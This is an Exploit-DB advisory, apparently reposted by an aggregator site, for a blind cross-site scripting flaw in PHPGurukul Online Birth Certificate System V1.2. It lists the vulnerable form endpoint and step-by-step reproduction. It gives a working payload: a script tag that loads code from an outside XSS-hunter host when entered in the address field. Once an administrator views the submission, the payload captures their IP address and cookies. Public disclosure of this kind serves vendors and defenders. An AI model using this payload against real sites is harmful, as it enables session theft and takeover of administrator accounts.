[webapps] PHPGurukul Online Birth Certificate System V 1.2 - Blind XSS
2023-3-25 08:0:0 Author: www.exploit-db.com(查看原文) 阅读量:4 收藏

Exploit Title: PHPGurukul Online Birth Certificate System V 1.2 - Blind XSS
# Date: 2022-10-02
# Exploit Author: Prasheek Kamble
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/online-birth-certificate-system-using-php-and-mysql/
# Version: V 1.2
# Vulnerable endpoint: http://localhost/Birth%20Certificate%20System/obcs/user/fill-birthregform.php
# Tested on MAC OS, XAMPP



Steps to reproduce:

1) Navigate to http://localhost/Birth%20Certificate%20System/obcs/user/fill-birthregform.php 
2) Fill the form and Enter xss payload "><script src=https://prasheekk05.xss.ht></script> in address field
3) Click on Add Details and intercept the request in Burpsuite
4) After this, the details have been submitted.
5) As soon as admin(Victim) receives our request, when he clicks on it to verify our form, the XSS payload gets fired.
6) Now attacker get's the details of victim like ip address, cookies of Victim, etc
7) So attacker is sucessful in getting the victim's ip address and other details.

#POC's

https://ibb.co/kSxFp2g 
https://ibb.co/VvSVRsy  
https://ibb.co/mSGp4FX 
https://ibb.co/hXbJ9TZ 
https://ibb.co/M6vS08S
            

文章来源: https://www.exploit-db.com/exploits/51061
如有侵权请联系:admin#unsafe.sh